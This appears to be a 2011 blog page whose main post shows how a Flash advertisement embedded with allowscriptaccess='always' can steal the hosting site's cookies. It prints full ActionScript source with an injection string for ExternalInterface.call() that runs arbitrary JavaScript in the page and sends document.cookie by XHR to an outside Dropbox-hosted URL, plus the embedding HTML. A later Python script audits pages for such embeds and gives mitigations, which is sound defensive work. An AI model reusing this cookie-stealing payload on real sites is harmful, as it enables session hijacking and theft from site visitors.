ssh root@somehost
... takes a long time before the password prompt appears.
So, in ~/.ssh/config:
GSSAPIAuthentication no
Thursday, March 31, 2011
Wednesday, March 16, 2011
how flash ads get your cookie
A Flash advertisement hosted at http://ad.com/ad.swf and displayed on http://yoursite.com can read the yoursite.com cookie and send it to ad.com.
Example setup: http://pastehtml.com/view/1dntfa4.html
The SWF is hosted on dl.dropbox.com. It reads document.cookie of pastehtml.com and sends it to dl.dropbox.com.
The SWF uses ExternalInterface.call() to execute arbitrary JavaScript. The host page embeds it with allowscriptaccess="always", which is what permits a SWF from another domain to call into the page.
This technique is explained here:
http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html
So, you can execute arbitrary JavaScript by passing a string of this form to ExternalInterface.call():
    "\\")); YOUR SCRIPT HERE }catch(e){}//""
And you can do cross-domain XHR using the SWF (only to the domain where the SWF is hosted).
Code:
    package {
        import flash.display.Sprite;
        import flash.external.ExternalInterface;
        import flash.text.TextField;
        import flash.text.TextFieldType;
        import flash.text.TextFieldAutoSize;
        import flash.system.Security;

        //advertisement swf doing xhr to their domain
        [SWF(width="300",height="300")]
        public class ad extends Sprite {
            private const output:TextField = new TextField();

            public function ad() {
                Security.allowDomain("*");
                output.width = 300;
                output.height = 300;
                output.multiline = true;
                output.wordWrap = true;
                output.border = true;
                output.text = "ad\n";
                addChild(output);
                // Debug variant: only logs the cookie to the browser console.
                //const script:String = '"\\"));console.debug(document.cookie);}catch(e){console.debug(e);}//""';
                // Argument string in the "\\")); ... }catch(e){}//"" form: the script part runs in the
                // embedding page and sends document.cookie to the host serving the swf.
                const script:String = '"\\"));var xhr=new XMLHttpRequest();xhr.open(\'GET\',\'http://dl.dropbox.com/u/17640032/flash-ad-cookie-steal/ad.as?\'+document.cookie,false);xhr.send();}catch(e){}//""';
                if (ExternalInterface.available) {
                    try {
                        ExternalInterface.call("", script);
                    } catch (error:SecurityError) {
                        output.appendText("A SecurityError occurred: " + error.message + "\n" + error.errorID + "\n" + error.name + "\n");
                    } catch (error:Error) {
                        output.appendText("An Error occurred: " + error.message + "\n");
                    }
                } else {
                    output.appendText("External interface is not available for this container.");
                }
            }
        }
    }
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <title>Advertisement</title>
        <script type="text/javascript">
            // Set a test cookie on the host page so there is something to read.
            var onReady = function() {
                document.cookie = "foo=bar";
            };
        </script>
    </head>
    <body onload="onReady();">
        <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
                id="ExternalInterfaceExample" width="300" height="300"
                codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
            <param name="movie" value="http://dl.dropbox.com/u/17640032/flash-ad-cookie-steal/ad.swf" />
            <param name="quality" value="high" />
            <param name="bgcolor" value="#869ca7" />
            <!-- "always" lets a swf from any domain script this page; the default is "sameDomain" -->
            <param name="allowscriptaccess" value="always" />
            <embed src="http://dl.dropbox.com/u/17640032/flash-ad-cookie-steal/ad.swf" quality="high" bgcolor="#869ca7"
                   width="300" height="300" name="ExternalInterfaceExample" align="middle"
                   play="true" loop="false" allowscriptaccess="always"
                   type="application/x-shockwave-flash"
                   flashvars='allowscriptaccess=always'
                   pluginspage="http://www.macromedia.com/go/getflashplayer">
            </embed>
        </object>
    </body>
    </html>
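A defender-side check for the embedding pattern in the host page above, as an added example that is not part of the original post: it lists SWF embeds that are loaded from another origin and granted allowscriptaccess="always", the combination that lets the ad script the page. The sample markup is constructed, and the names origin, FlashEmbedAudit and audit are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

def origin(url):
    """(scheme, host, port) triple used for the same-origin comparison."""
    p = urlsplit(url)
    return (p.scheme, p.hostname, p.port or {"http": 80, "https": 443}.get(p.scheme))

class FlashEmbedAudit(HTMLParser):
    """Collects the SWF URL and AllowScriptAccess value of every embed."""
    def __init__(self):
        super().__init__()
        self.embeds = []      # one dict per <object> or <embed>
        self.current = None   # <object> whose <param> children are being read

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            self.current = {"swf": a.get("data", ""), "access": ""}
            self.embeds.append(self.current)
        elif tag == "param" and self.current is not None:
            name = a.get("name", "").lower()
            if name == "movie":
                self.current["swf"] = a.get("value", "")
            elif name == "allowscriptaccess":
                self.current["access"] = a.get("value", "")
        elif tag == "embed":
            self.embeds.append({"swf": a.get("src", ""),
                                "access": a.get("allowscriptaccess", "")})

    def handle_endtag(self, tag):
        if tag == "object":
            self.current = None

def audit(page_url, html):
    """Return SWF URLs from another origin that are allowed to script the page."""
    parser = FlashEmbedAudit()
    parser.feed(html)
    urls = [(urljoin(page_url, e["swf"]), e["access"].lower()) for e in parser.embeds]
    return [u for u, access in urls
            if access == "always" and origin(u) != origin(page_url)]

# Constructed sample markup; host names taken from the post's first sentence.
SAMPLE = """<object><param name="movie" value="http://ad.com/ad.swf" />
<param name="allowscriptaccess" value="always" />
<embed src="/local/banner.swf" allowscriptaccess="always"></object>
<embed src="http://ad.com/other.swf" allowscriptaccess="never">"""
if __name__ == "__main__":
    print(audit("http://yoursite.com/", SAMPLE))
```

Setting AllowScriptAccess to "never" or "sameDomain" for third-party SWFs closes this path. Cookies flagged HttpOnly are not visible through document.cookie in either case.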